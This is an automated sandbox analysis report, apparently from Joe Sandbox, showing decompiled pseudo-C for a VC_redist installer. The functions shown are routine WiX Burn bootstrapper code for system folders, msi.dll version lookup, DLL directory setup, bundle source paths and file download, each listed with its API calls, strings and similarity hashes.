                                                                          							if(_t39 >= 0) {
                                                                          								goto L9;
                                                                          							} else {
                                                                          								_push("Failed to backslash terminate system folder.");
                                                                          								goto L11;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						_t27 =  !=  ? 0 : GetLastError();
                                                                          						if(_t27 == 0) {
                                                                          							goto L6;
                                                                          						} else {
                                                                          							_t45 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          							_t39 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "variable.cpp", 0x777, _t39);
                                                                          							_push("Failed to get 32-bit system folder.");
                                                                          							L11:
                                                                          							_push(_t39);
                                                                          							E0005012F();
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return E0003DE36(_t30, _v8 ^ _t46, _t36, _t37, _t39);
                                                                          			}



















                                                                          APIs
                                                                          • GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 000164F7
                                                                          • GetLastError.KERNEL32 ref: 00016505
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00016546
                                                                          • GetLastError.KERNEL32 ref: 00016550
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorLastSystem$Wow64
                                                                          • String ID: @Met$Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                          • API String ID: 2634638900-589889694
                                                                          • Opcode ID: 34bf61dd9944659e57c36b44d1b5a32e101a23114356c154a769cd8736d5439e
                                                                          • Instruction ID: 99018539a8e4801e752ae8280b7bb4905286898229c66ebb1b0d97294939b3f8
                                                                          • Opcode Fuzzy Hash: 34bf61dd9944659e57c36b44d1b5a32e101a23114356c154a769cd8736d5439e
                                                                          • Instruction Fuzzy Hash: 46212B71E4073566EB2067A59C05BEB36DC9F00751F100166FD08EB1C1EA25DE8885E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 19%
                                                                          			E0001671C(void* __edx, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed short _v20;
                                                                          				signed short _v24;
                                                                          				char _v28;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t9;
                                                                          				_Unknown_base(*)()* _t13;
                                                                          				signed short _t22;
                                                                          				intOrPtr _t25;
                                                                          				void* _t32;
                                                                          				char* _t33;
                                                                          				void* _t34;
                                                                          				signed int _t38;
                                                                          
                                                                          				_t32 = __edx;
                                                                          				_t9 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t9 ^ _t38;
                                                                          				_t25 = _a8;
                                                                          				_t33 =  &_v28;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t13 = GetProcAddress(GetModuleHandleW(L"msi"), "DllGetVersion");
                                                                          				if(_t13 != 0) {
                                                                          					_v28 = 0x14;
                                                                          					_t34 =  *_t13( &_v28);
                                                                          					if(_t34 >= 0) {
                                                                          						asm("cdq");
                                                                          						_t34 = E00030455(_t25, 0, (_v24 & 0x0000ffff) << 0x00000010 | _v20 & 0x0000ffff);
                                                                          						if(_t34 < 0) {
                                                                          							_push("Failed to set variant value.");
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to get msi.dll version info.");
                                                                          						goto L6;
                                                                          					}
                                                                          				} else {
                                                                          					_t22 = GetLastError();
                                                                          					_t37 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          					_t34 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "variable.cpp", 0x725, _t34);
                                                                          					_push("Failed to find DllGetVersion entry point in msi.dll.");
                                                                          					L6:
                                                                          					_push(_t34);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return E0003DE36(_t25, _v8 ^ _t38, _t32, _t33, _t34);
                                                                          			}




















                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00016746
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0001674D
                                                                          • GetLastError.KERNEL32 ref: 00016757
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastModuleProc
                                                                          • String ID: @Met$DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                          • API String ID: 4275029093-1478416031
                                                                          • Opcode ID: e76f3fd0e9209da1eaf89e6753c7348b005acce1a7e3ed5a15ebac7cf372ba19
                                                                          • Instruction ID: f754e504191a9a275d9c8868cae07efcfe4820661049bf0cdf8b13d317e6992f
                                                                          • Opcode Fuzzy Hash: e76f3fd0e9209da1eaf89e6753c7348b005acce1a7e3ed5a15ebac7cf372ba19
                                                                          • Instruction Fuzzy Hash: 66112971B04729AAE720ABB8DC46AFF76D8DB08711F00051AFE05FB1C1EA259C0882E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E00011174(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				_Unknown_base(*)()* _t9;
                                                                          				_Unknown_base(*)()* _t10;
                                                                          				long _t11;
                                                                          				void* _t14;
                                                                          				struct HINSTANCE__* _t15;
                                                                          				void* _t18;
                                                                          				intOrPtr _t21;
                                                                          				void* _t22;
                                                                          				signed int _t23;
                                                                          
                                                                          				_t23 = 0;
                                                                          				_v8 = 0;
                                                                          				__imp__HeapSetInformation(0, 1, 0, 0, _t18, _t22, _t14, __ecx);
                                                                          				_t15 = GetModuleHandleW(L"kernel32");
                                                                          				_t9 = GetProcAddress(_t15, "SetDefaultDllDirectories");
                                                                          				if(_t9 == 0) {
                                                                          					L3:
                                                                          					_t10 = GetProcAddress(_t15, "SetDllDirectoryW");
                                                                          					if(_t10 == 0) {
                                                                          						L5:
                                                                          						_t11 = GetLastError();
                                                                          					} else {
                                                                          						_t11 =  *_t10(0x5b524);
                                                                          						if(_t11 == 0) {
                                                                          							goto L5;
                                                                          						}
                                                                          					}
                                                                          					if(_a8 > _t23) {
                                                                          						_t21 = _a4;
                                                                          						do {
                                                                          							_t11 = E000137D6( *((intOrPtr*)(_t21 + _t23 * 4)),  &_v8);
                                                                          							_t23 = _t23 + 1;
                                                                          						} while (_t23 < _a8);
                                                                          					}
                                                                          				} else {
                                                                          					_t11 =  *_t9(0x800);
                                                                          					if(_t11 == 0) {
                                                                          						GetLastError();
                                                                          						goto L3;
                                                                          					}
                                                                          				}
                                                                          				return _t11;
                                                                          			}














                                                                          APIs
                                                                          • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 00011185
                                                                          • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 00011190
                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0001119E
                                                                          • GetLastError.KERNEL32(?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 000111B9
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000111C1
                                                                          • GetLastError.KERNEL32(?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 000111D6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                          • String ID: @Met$SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                          • API String ID: 3104334766-461836836
                                                                          • Opcode ID: 9e962d5f40bd3539296917bdf604a1e42b96b4a9a7910352e00cf6bea8a000f4
                                                                          • Instruction ID: f4b53d101c909a71aefbc5d34f99e85219ed1b3b6fa326fc9bc0170b41b651f6
                                                                          • Opcode Fuzzy Hash: 9e962d5f40bd3539296917bdf604a1e42b96b4a9a7910352e00cf6bea8a000f4
                                                                          • Instruction Fuzzy Hash: 4E017571600715BB9B256BE69C09DEFBBACFF407A27004011FF1596180DB74EA458BB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0002E31B(void** _a4, int _a8, int _a12, long _a16) {
                                                                          				void* _t16;
                                                                          				void* _t19;
                                                                          				long _t28;
                                                                          				struct HDC__* _t32;
                                                                          				void* _t35;
                                                                          				void* _t36;
                                                                          				void* _t38;
                                                                          				void* _t39;
                                                                          				struct HWND__* _t41;
                                                                          				void** _t43;
                                                                          				long _t45;
                                                                          
                                                                          				_t41 = _a4;
                                                                          				_t43 = GetWindowLongW(_t41, 0xffffffeb);
                                                                          				_t16 = 2;
                                                                          				_a4 = _t43;
                                                                          				_t35 = _a8 - _t16;
                                                                          				if(_t35 == 0) {
                                                                          					PostQuitMessage(0);
                                                                          					return 0;
                                                                          				}
                                                                          				_t36 = _t35 - 0x12;
                                                                          				if(_t36 == 0) {
                                                                          					_t32 = CreateCompatibleDC(_a12);
                                                                          					_t19 = SelectObject(_t32,  *_t43);
                                                                          					StretchBlt(_a12, 0, 0, _a4[3], _a4[4], _t32, 0, 0,  *(_t20 + 0xc),  *(_t20 + 0x10), 0xcc0020);
                                                                          					SelectObject(_t32, _t19);
                                                                          					DeleteDC(_t32);
                                                                          					return 1;
                                                                          				}
                                                                          				_t45 = _a16;
                                                                          				_t38 = _t36 - 0x6d;
                                                                          				if(_t38 == 0) {
                                                                          					SetWindowLongW(_t41, 0xffffffeb,  *_t45);
                                                                          					L8:
                                                                          					return DefWindowProcW(_t41, _a8, _a12, _t45);
                                                                          				}
                                                                          				_t39 = _t38 - 1;
                                                                          				if(_t39 == 0) {
                                                                          					_t28 = DefWindowProcW(_t41, 0x82, _a12, _t45);
                                                                          					SetWindowLongW(_t41, 0xffffffeb, 0);
                                                                          					return _t28;
                                                                          				}
                                                                          				if(_t39 != _t16) {
                                                                          					goto L8;
                                                                          				}
                                                                          				return _t16;
                                                                          			}















                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0002E326
                                                                          • DefWindowProcW.USER32(?,00000082,?,?), ref: 0002E364
                                                                          • SetWindowLongW.USER32 ref: 0002E371
                                                                          • SetWindowLongW.USER32 ref: 0002E380
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 0002E38E
                                                                          • CreateCompatibleDC.GDI32(?), ref: 0002E39A
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0002E3AB
                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0002E3CD
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0002E3D5
                                                                          • DeleteDC.GDI32(00000000), ref: 0002E3D8
                                                                          • PostQuitMessage.USER32(00000000), ref: 0002E3E6
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                          • String ID:
                                                                          • API String ID: 409979828-0
                                                                          • Opcode ID: a1a018620aef1d7bd05d8aebde4d2ff8e7d9e89be0ed41df82d4dd7da376126b
                                                                          • Instruction ID: 352fd673edad90b37cc91602ce06066aca080d18497077702c79e328a37c19d9
                                                                          • Opcode Fuzzy Hash: a1a018620aef1d7bd05d8aebde4d2ff8e7d9e89be0ed41df82d4dd7da376126b
                                                                          • Instruction Fuzzy Hash: E421AC32140218BFEB249F68EC4CE7B3FA9EF49322B094518F616971B0D774AA109B60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E00029F36(void* __edx, void* __eflags, short* _a4, intOrPtr _a8, int* _a12, signed int _a16) {
                                                                          				signed int _v8;
                                                                          				short* _v20;
                                                                          				int _v24;
                                                                          				int _v28;
                                                                          				void* _v32;
                                                                          				char _v36;
                                                                          				char _v40;
                                                                          				char _v44;
                                                                          				int* _v48;
                                                                          				signed int _v52;
                                                                          				char _v56;
                                                                          				intOrPtr _v60;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t70;
                                                                          				signed int _t79;
                                                                          				signed int _t81;
                                                                          				signed int _t83;
                                                                          				signed int _t85;
                                                                          				void* _t99;
                                                                          				int* _t102;
                                                                          				int _t109;
                                                                          				short* _t112;
                                                                          				void* _t114;
                                                                          				void* _t119;
                                                                          				signed int _t127;
                                                                          				signed int _t128;
                                                                          
                                                                          				_t119 = __edx;
                                                                          				_t70 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t70 ^ _t128;
                                                                          				_t113 = 0;
                                                                          				_v60 = _a8;
                                                                          				_t112 = _a4;
                                                                          				_v48 = _a12;
                                                                          				_v52 = _a16;
                                                                          				_v36 = 0;
                                                                          				asm("stosd");
                                                                          				_v32 = 0;
                                                                          				_v28 = 0;
                                                                          				asm("stosd");
                                                                          				_v24 = 0;
                                                                          				_v44 = 0;
                                                                          				_v40 = 0;
                                                                          				asm("stosd");
                                                                          				_t121 = 0;
                                                                          				if(E00013568(_t112) == 0) {
                                                                          					_t124 = _v60;
                                                                          					_v56 = 0;
                                                                          					_t79 = E0001738E(0, _v60, L"WixBundleLastUsedSource",  &_v24);
                                                                          					__eflags = _t79 - 0x80070490;
                                                                          					if(_t79 == 0x80070490) {
                                                                          						_t79 = E0001738E(0, _t124, L"WixBundleOriginalSource",  &_v56);
                                                                          						__eflags = _t79;
                                                                          						if(_t79 >= 0) {
                                                                          							_t79 = E00013446(0, _v56,  &_v24);
                                                                          						}
                                                                          					}
                                                                          					__eflags =  *0x7aaa8 - _t121; // 0x0
                                                                          					if(__eflags == 0) {
                                                                          						L7:
                                                                          						_t81 = E00013446(_t113,  *0x7aa90,  &_v36);
                                                                          						__eflags = _t81;
                                                                          						if(_t81 >= 0) {
                                                                          							_t83 = E00012D79(_t113, _v36, _t112,  &_v32);
                                                                          							__eflags = _t83;
                                                                          							if(_t83 >= 0) {
                                                                          								_v20 = _v32;
                                                                          								_t121 = 1;
                                                                          								__eflags = 1;
                                                                          								goto L12;
                                                                          							}
                                                                          							goto L10;
                                                                          						}
                                                                          						_push("Failed to get current process directory.");
                                                                          						goto L35;
                                                                          					} else {
                                                                          						__eflags = _t79;
                                                                          						if(_t79 >= 0) {
                                                                          							L12:
                                                                          							_t85 = _v24;
                                                                          							__eflags = _t85;
                                                                          							if(_t85 == 0) {
                                                                          								L18:
                                                                          								_t127 = E0001738E(_t113, _v60, L"WixBundleLayoutDirectory",  &_v40);
                                                                          								__eflags = _t127 - 0x80070490;
                                                                          								if(_t127 == 0x80070490) {
                                                                          									L24:
                                                                          									_t114 = 0;
                                                                          									_t112 = 0;
                                                                          									 *_v48 = 0;
                                                                          									if(_t121 == 0) {
                                                                          										_t121 = _v52;
                                                                          										L33:
                                                                          										_t127 = E000121A5(_t121, _v20, _t114);
                                                                          										if(_t127 >= 0) {
                                                                          											L36:
                                                                          											if(_v32 != 0) {
                                                                          												E000554EF(_v32);
                                                                          											}
                                                                          											if(_v36 != 0) {
                                                                          												E000554EF(_v36);
                                                                          											}
                                                                          											if(_v24 != 0) {
                                                                          												E000554EF(_v24);
                                                                          											}
                                                                          											if(_v28 != 0) {
                                                                          												E000554EF(_v28);
                                                                          											}
                                                                          											if(_v40 != 0) {
                                                                          												E000554EF(_v40);
                                                                          											}
                                                                          											if(_v44 != 0) {
                                                                          												E000554EF(_v44);
                                                                          											}
                                                                          											return E0003DE36(_t112, _v8 ^ _t128, _t119, _t121, _t127);
                                                                          										}
                                                                          										L34:
                                                                          										_push("Failed to copy source path.");
                                                                          										L35:
                                                                          										_push(_t127);
                                                                          										E0005012F();
                                                                          										goto L36;
                                                                          									} else {
                                                                          										goto L25;
                                                                          									}
                                                                          									while(1) {
                                                                          										L25:
                                                                          										_t99 = E00054315( *((intOrPtr*)(_t128 + _t112 * 4 - 0x10)), _t114);
                                                                          										if(_t99 != 0) {
                                                                          											break;
                                                                          										}
                                                                          										_t112 =  &(_t112[0]);
                                                                          										_t114 = _t99;
                                                                          										if(_t112 < _t121) {
                                                                          											continue;
                                                                          										}
                                                                          										_t102 = _v48;
                                                                          										_t121 = _v52;
                                                                          										L30:
                                                                          										_t114 = 0;
                                                                          										if( *_t102 != 0) {
                                                                          											goto L36;
                                                                          										}
                                                                          										goto L33;
                                                                          									}
                                                                          									_t121 = _v52;
                                                                          									_t127 = E000121A5(_v52,  *((intOrPtr*)(_t128 + _t112 * 4 - 0x10)), 0);
                                                                          									__eflags = _t127;
                                                                          									if(_t127 < 0) {
                                                                          										goto L34;
                                                                          									}
                                                                          									_t102 = _v48;
                                                                          									 *_t102 = 1;
                                                                          									goto L30;
                                                                          								}
                                                                          								__eflags = _t127;
                                                                          								if(_t127 >= 0) {
                                                                          									_t127 = E00012D79(_t113, _v40, _t112,  &_v44);
                                                                          									__eflags = _t127;
                                                                          									if(_t127 >= 0) {
                                                                          										 *((intOrPtr*)(_t128 + _t121 * 4 - 0x10)) = _v44;
                                                                          										_t121 = _t121 + 1;
                                                                          										__eflags = _t121;
                                                                          										goto L24;
                                                                          									}
                                                                          									_push("Failed to combine layout source with source.");
                                                                          									goto L35;
                                                                          								}
                                                                          								_push("Failed to get bundle layout directory property.");
                                                                          								goto L35;
                                                                          							}
                                                                          							_t113 = 0;
                                                                          							__eflags =  *_t85;
                                                                          							if( *_t85 == 0) {
                                                                          								goto L18;
                                                                          							}
                                                                          							_t113 =  &_v28;
                                                                          							_t127 = E00012D79( &_v28, _t85, _t112,  &_v28);
                                                                          							__eflags = _t127;
                                                                          							if(_t127 < 0) {
                                                                          								L10:
                                                                          								_push("Failed to combine last source with source.");
                                                                          								goto L35;
                                                                          							}
                                                                          							__eflags = _t121;
                                                                          							if(_t121 == 0) {
                                                                          								L17:
                                                                          								 *((intOrPtr*)(_t128 + _t121 * 4 - 0x10)) = _v28;
                                                                          								_t121 = _t121 + 1;
                                                                          								__eflags = _t121;
                                                                          								goto L18;
                                                                          							}
                                                                          							_t109 = CompareStringW(0, 1, _v20, 0xffffffff, _v28, 0xffffffff);
                                                                          							__eflags = _t109 - 2;
                                                                          							if(_t109 == 2) {
                                                                          								goto L18;
                                                                          							}
                                                                          							goto L17;
                                                                          						}
                                                                          						goto L7;
                                                                          					}
                                                                          				}
                                                                          				_v20 = _t112;
                                                                          				_t121 = 1;
                                                                          				goto L24;
                                                                          			}

                                                                          Strings
                                                                          • WixBundleLastUsedSource, xrefs: 00029F9D
                                                                          • Failed to combine layout source with source., xrefs: 0002A0A0
                                                                          • Failed to combine last source with source., xrefs: 0002A00C
                                                                          • Failed to get current process directory., xrefs: 00029FEF
                                                                          • WixBundleLayoutDirectory, xrefs: 0002A068
                                                                          • Failed to get bundle layout directory property., xrefs: 0002A083
                                                                          • Failed to copy source path., xrefs: 0002A113
                                                                          • WixBundleOriginalSource, xrefs: 00029FB3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirstlstrlen
                                                                          • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                          • API String ID: 2767606509-3003062821
                                                                          • Opcode ID: 4e8e68fbfd9f6be5a4e2e800d45aba92ff68151091e8db7ea02beb69e5ec72cd
                                                                          • Instruction ID: c6c1df31982de4096dfbe575b18158174cdc067ac9bcc338b3d0e67b4ce19935
                                                                          • Opcode Fuzzy Hash: 4e8e68fbfd9f6be5a4e2e800d45aba92ff68151091e8db7ea02beb69e5ec72cd
                                                                          • Instruction Fuzzy Hash: 76714071E00229AFDF11DFA4EC41AFEBBB9AF09715F100129F911B7251DB359D908B62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 62%
                                                                          			E00055916(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, signed short _a24, WCHAR* _a28, signed short _a32, signed short _a36, char _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56) {
                                                                          				signed int _v8;
                                                                          				signed short _v12;
                                                                          				signed int _v16;
                                                                          				char _v20;
                                                                          				struct _SECURITY_ATTRIBUTES* _v24;
                                                                          				void* _v28;
                                                                          				WCHAR* _v32;
                                                                          				signed short _v36;
                                                                          				void* _t61;
                                                                          				signed short _t62;
                                                                          				signed short _t63;
                                                                          				void* _t64;
                                                                          				void* _t65;
                                                                          				signed short _t76;
                                                                          				signed short _t81;
                                                                          				signed short _t84;
                                                                          				void* _t85;
                                                                          				signed short _t88;
                                                                          				signed short _t89;
                                                                          				signed short _t92;
                                                                          				signed short _t93;
                                                                          				signed short _t94;
                                                                          				signed short _t97;
                                                                          
                                                                          				_v12 = 1;
                                                                          				_t92 = 0;
                                                                          				_v24 = 0;
                                                                          				_t88 = 0;
                                                                          				_v20 = 0;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				_v8 = 0;
                                                                          				_t94 = 0;
                                                                          				_v16 = 0;
                                                                          				asm("movlpd [ebp-0x20], xmm0");
                                                                          				_t61 = CreateFileW(_a20, 0xc0000000, 4, 0, 4, 0x80, 0);
                                                                          				_v28 = _t61;
                                                                          				if(_t61 != 0xffffffff) {
                                                                          					_t62 = VirtualAlloc(0, 0x10000, 0x3000, 4);
                                                                          					_v24 = _t62;
                                                                          					__eflags = _t62;
                                                                          					if(_t62 != 0) {
                                                                          						_t63 = _a36;
                                                                          						_t89 = _a32;
                                                                          						_a20 = _t63;
                                                                          						_a36 = _t89;
                                                                          						while(1) {
                                                                          							__eflags = _t89;
                                                                          							if(_t89 != 0) {
                                                                          								goto L9;
                                                                          							}
                                                                          							__eflags = _t63;
                                                                          							if(_t63 != 0) {
                                                                          								goto L9;
                                                                          							}
                                                                          							_t89 = _a24;
                                                                          							_t63 = _a28;
                                                                          							L12:
                                                                          							_t94 = E00055890(_t89, _a40, _a44, _t89, _t63,  &_v20);
                                                                          							__eflags = _t94;
                                                                          							if(_t94 < 0) {
                                                                          								L30:
                                                                          								__eflags = _t88;
                                                                          								if(_t88 != 0) {
                                                                          									 *0x7a96c(_t88);
                                                                          								}
                                                                          								__eflags = _t92;
                                                                          								if(_t92 != 0) {
                                                                          									 *0x7a96c(_t92);
                                                                          								}
                                                                          								L34:
                                                                          								if(_v20 != 0) {
                                                                          									E000554EF(_v20);
                                                                          								}
                                                                          								_t64 = _v24;
                                                                          								if(_t64 != 0) {
                                                                          									VirtualFree(_t64, 0, 0x8000);
                                                                          								}
                                                                          								_t65 = _v28;
                                                                          								if(_t65 != 0xffffffff) {
                                                                          									CloseHandle(_t65);
                                                                          								}
                                                                          								return _t94;
                                                                          							}
                                                                          							__eflags = _t92;
                                                                          							if(_t92 != 0) {
                                                                          								 *0x7a96c(_t92);
                                                                          								_t20 =  &_v8;
                                                                          								 *_t20 = _v8 & 0x00000000;
                                                                          								__eflags =  *_t20;
                                                                          							}
                                                                          							__eflags = _t88;
                                                                          							if(_t88 != 0) {
                                                                          								 *0x7a96c(_t88);
                                                                          								_t22 =  &_v16;
                                                                          								 *_t22 = _v16 & 0x00000000;
                                                                          								__eflags =  *_t22;
                                                                          							}
                                                                          							_t76 = E00055D7F(_a4, _a8, L"GET", _v20, _a12, _a16, _a56,  &_v8,  &_v16,  &_v12);
                                                                          							_t88 = _v16;
                                                                          							_t94 = _t76;
                                                                          							__eflags = _t94;
                                                                          							if(_t94 < 0) {
                                                                          								L29:
                                                                          								_t92 = _v8;
                                                                          								goto L30;
                                                                          							} else {
                                                                          								_t90 = _a36;
                                                                          								_t77 = _a20;
                                                                          								__eflags = _t90;
                                                                          								if(_t90 != 0) {
                                                                          									L22:
                                                                          									_t93 = _v12;
                                                                          									L23:
                                                                          									__eflags = _t93;
                                                                          									if(_t93 == 0) {
                                                                          										asm("xorps xmm0, xmm0");
                                                                          										asm("movlpd [ebp+0x2c], xmm0");
                                                                          									}
                                                                          									_t94 = E000561FA(_t90, _t88, _v28,  &_a40, _a48, _t90, _t77, _v24, 0x10000, _a52);
                                                                          									__eflags = _t94;
                                                                          									if(_t94 < 0) {
                                                                          										goto L29;
                                                                          									} else {
                                                                          										__eflags = _t93;
                                                                          										_t92 = _v8;
                                                                          										if(_t93 == 0) {
                                                                          											goto L30;
                                                                          										}
                                                                          										_t63 = _a20;
                                                                          										_t89 = _a36;
                                                                          										continue;
                                                                          									}
                                                                          								}
                                                                          								__eflags = _t77;
                                                                          								if(_t77 != 0) {
                                                                          									goto L22;
                                                                          								}
                                                                          								_t81 = E000588BE(_t90, _t88,  &_v36);
                                                                          								__eflags = _t81;
                                                                          								if(_t81 < 0) {
                                                                          									_t90 = _a24;
                                                                          									_t93 = 0;
                                                                          									_t77 = _a28;
                                                                          									_a36 = _a24;
                                                                          									_a20 = _a28;
                                                                          									_v12 = 0;
                                                                          									goto L23;
                                                                          								}
                                                                          								_t90 = _v36;
                                                                          								_t77 = _v32;
                                                                          								_a36 = _v36;
                                                                          								_a20 = _v32;
                                                                          								goto L22;
                                                                          							}
                                                                          							L9:
                                                                          							__eflags = _a44 - _t63;
                                                                          							if(__eflags > 0) {
                                                                          								goto L30;
                                                                          							}
                                                                          							if(__eflags < 0) {
                                                                          								goto L12;
                                                                          							}
                                                                          							__eflags = _a40 - _t89;
                                                                          							if(_a40 >= _t89) {
                                                                          								goto L30;
                                                                          							}
                                                                          							goto L12;
                                                                          						}
                                                                          					}
                                                                          					_t84 = GetLastError();
                                                                          					__eflags = _t84;
                                                                          					_t97 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
                                                                          					_t85 = 0x80004005;
                                                                          					__eflags = _t97;
                                                                          					_t94 =  >=  ? 0x80004005 : _t97;
                                                                          					_push(_t94);
                                                                          					_push(0x126);
                                                                          					L2:
                                                                          					_push("dlutil.cpp");
                                                                          					E000137D3(_t85);
                                                                          					goto L34;
                                                                          				}
                                                                          				_t100 =  <=  ? GetLastError() : _t87 & 0x0000ffff | 0x80070000;
                                                                          				_t85 = 0x80004005;
